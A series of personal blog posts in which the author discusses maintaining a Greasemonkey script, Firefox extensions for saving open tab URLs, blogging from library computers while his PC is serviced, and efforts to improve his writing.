I suppose that one could be amused by the irony of how what appears to be my most frequently used script is a script that I personally do not often use. However, with many people apparently using it, it fortunately appears to be the one with largest user base to report errors and suggest solutions to errors. I would say that I had done well in updating it considering that I received no notifications of the script not working and considering that I have recently been unable to work with a browser with Greasemonkey installed on it. However, I have written this for the users who want it, and I will try to maintain it for the same reason.

Problems with Tabbed Web Browsing (And How I Wish I Could Experience Them Now)

As I continue do the work that I would do with this blog without the ability to use my own personal computer, I continue to look for work to do once I am able to use my computer once again. I have spent the more limited time in which I have been able to access the web looking for ideas on what to write and on what my next software project should be. In fact, I have spent so much time focusing on the content of my blog posts and on the software that I work on that I have made general maintenance of this blog a lower priority than it should have been. And after making a few overdue updates to the sidebar of this blog, I now write about a topic that I have thought about before, although I have not thought about it as much until recently. This topic is the topic of issues associated with tabbed web browsing. And it was after viewing this entry on Lifehacker that I was reminded why I ever gave some thought to this topic. It describes a common problem that tends to occur when many browser tabs are open, and one interesting approach to solving this problem, leading me to consider other possible approaches to it.

When I look back on the first time that I was able to use separate tabs within a web browser, I, like many others who had discovered tabbed browsing for the first time, thought tabbed browsing was a great idea. It changed the way in which many users browsed the web. Previously, I never would have thought that there would be a time that I would have literally dozens of web pages open at a time. However, I have found that there are not many times that I have fewer than a dozen browser tabs open in my browser at once. And having so many web pages open is something that never would have happened if I needed to open these web pages in separate browser windows.

However, as is often the case with useful innovations, issues associated with these innovations arise. And one such issue is one that occurs when, as is often the case, many tabs are open at once. What I often find happens is that I would like to have the ability to later recover the information on what was in each browser tab at a particular time. Sometimes I would like to ensure that I am able to continue from where I left off in case my browser or PC crashes. I also tend to open links in new tabs with the intention of reading what I open in these tabs at a later time. To solve this problem that apparently many others also have, what I personally have done is bookmark all open tabs and store them in a separate folder for them whenever I want to save information on what I have open at a particular time. However, this leads to clutter in my list of bookmarks. And what if I simply want to know which URLs I had open, without bringing them up again in browser tabs or looking in places such as the bookmarks.html file in my Firefox profile folder? What can be done about this? Well, when using Mozilla Firefox, this is something that can be addressed, as one would expect with Firefox, through Firefox extensions.

As was noted in the previously mentioned Lifehacker article, the extension titled Copy All Urls is useful for times when one needs to save a copy of the URLs one has open at a particular time. With this extension installed, one can copy the URL in each open tab to the clipboard, so that these URLs can be pasted anywhere one would want to paste them. Another feature of it that can be quite useful is the option to include of the page title with each URL. This feature is good to have, because URLs do not always give informative descriptions of the content at the URL, whereas page titles often do. There are other useful features that this extension has, such as the option to have the URLs copied in HTML form. However, inclusion of features such as these can lead to ideas about other features that can be added, and in turn, to extensions that implement these features. And perhaps not surprisingly, ideas on additional features that could be included, and information about extensions that perform related tasks were mentioned in the comments section of the Lifehacker article.

It does not come as a surprise that extensions similar to Copy All Urls are already publicly available. One that performs a similar task that was mentioned in the comments section of the Lifehacker article was the extension known as Tab URL Copier. This extension gives the option to copy the URLs in all tabs (or only the URL in the currently selected tab) to the clipboard after right-clicking the web page in the tab that is currently selected. There is also the Send Tab URLs extension that is specialized to the task of e-mailing these URLs. And then there is the Session Manager extension that takes the concept of restoring browser sessions that one has open a few steps further. In addition to giving the user the ability to reopen tabs one has open at a time, it tries to restore them to the state they were in when they were closed. For example, it can restore data that was entered into forms on web pages that were open, which is something else that many users would want restored after the browser closes unexpectedly.

Indeed, many have considered issues related to tabbed browsing and have approached these issues in a number of ways. And as I previously mentioned, the topic of tabbed browsing issues has been one that I have thought about. In fact, I myself have thought about it enough to consider writing a Firefox extension that performs the tasks related to saving and restoring the information in browser tabs. I have discovered that some have already implemented ideas similar to the one I had. However, I am sure that other users would like something from their imagination implemented. One example of such as idea is the idea of integration of bookmarking open tabs with saving URLs to social bookmarking sites such as Del.icio.us, which was a suggestion made in the comments section of the Lifehacker article.

I am not sure if working on issues related to tabbed browsing will be my next major project. However, it is a topic that I find too interesting to not consider at least at some point. I have gained a new appreciation for tabbed browsing not only because of these articles on the web that I have read. It is also because the PCs at the library from which I have had to blog do not have any browsers installed on them that have tabbed browsing as a feature. I certainly would prefer to deal with the issues that come with tabbed browsing than the problem of the lack of existence of browser tabs.

Making the Best of an Unfortunate Situation

I am presently facing the kind of difficulty that I am sure many other bloggers have encountered. And it is not writer’s block, or anything else related to anything that tends to be be addressed by those who give tips about blogging. The difficulty that I am presently having is that the computer that I primarily use needs to be serviced, and I do not own another computer.

During this time that I have needed to access the web from other places, it has been a challenge for me to keep this blog updated. In addition to the most obvious difficulty of being unable to log into my account as often, there are other difficulties that I am having. I am unable to work on any of the software projects that I have been working on, and I am unable to spend as much time looking online for anything to write about. I knew that I was quite dependent on my personal computer, and I did not think that I needed this reminder of exactly how dependent upon it I have been.

However, it has been during this time that I have found that I may have relied on my PC more than I should have. With my PC unavailable to me at this time, I have considered this a time to read a few books that I have been trying to find the time to read. It was in my last post that I said that people tend to read from paper differently from how they read what is on a screen. And so it is during this time that I have been able to take time to learn about concepts that I have been trying to learn about in what may be a more thorough fashion. Finding other ways to occupy my time has given me an opportunity to find different ways of approaching problems other than approaching them through the use of a computer.

I can think of this as a break that I am taking from the routine of looking online for information and from the work I do in writing software code. Time away from the computer can be valuable and I am getting a reminder of how valuable that time can be. I certainly do need to have access to my PC and the web for what I do. I have been looking to take the time to give Firefox 3 Beta 2 a test drive, and I am considering getting those Greasemonkey scripts that I have been working on released as soon as possible. I have not been sure what exactly should be considered a higher priority among what it is that I have planned on doing. However, time away from what I have done has helped me find out what is most important. And that is one of a few reasons that having to take this break from my usual routines could be quite beneficial for me in the long run.

Improving on How I Write

It has seemed to me that articles found on sites such as Digg on how one can improve one’s blog have been appearing more often. And it also seems that there are more books available for those looking to improve their blogs. Or perhaps it is that I have been paying more attention to what is being said about blogging. And perhaps a reason I have been paying more attention to anything blogging-related is because I think some advice would be useful, despite what I have said before about articles and books about blogging. I would say that if there is something that I can improve on here, it would be how I write what I write. My way of writing has, perhaps understandably, been criticized. And so as I continue to spend much time ensuring that what I write here is well-written, I look to see what I can do to improve on how I write what is written here.

It might be best for me to look for advice specific to blogs, as opposed to advice on how one can improve on one’s writing in general. I have found that people tend to read what is on a screen somewhat differently from how they read from a sheet of paper. This is something that perhaps I should have known and considered, and I may need to know what I can do differently to make what I write more appropriate for a blog. And so this has made me consider buying a book on this topic, despite that fact that these books often contain information that I may not find useful.

I have thought that I will look back on the first posts to my blog and consider them ones that were written before I became very good at blogging. I have expected to improve over time. However, I may not be able to do that without some advice, whether this advice can be found online or in a more old-fashioned way.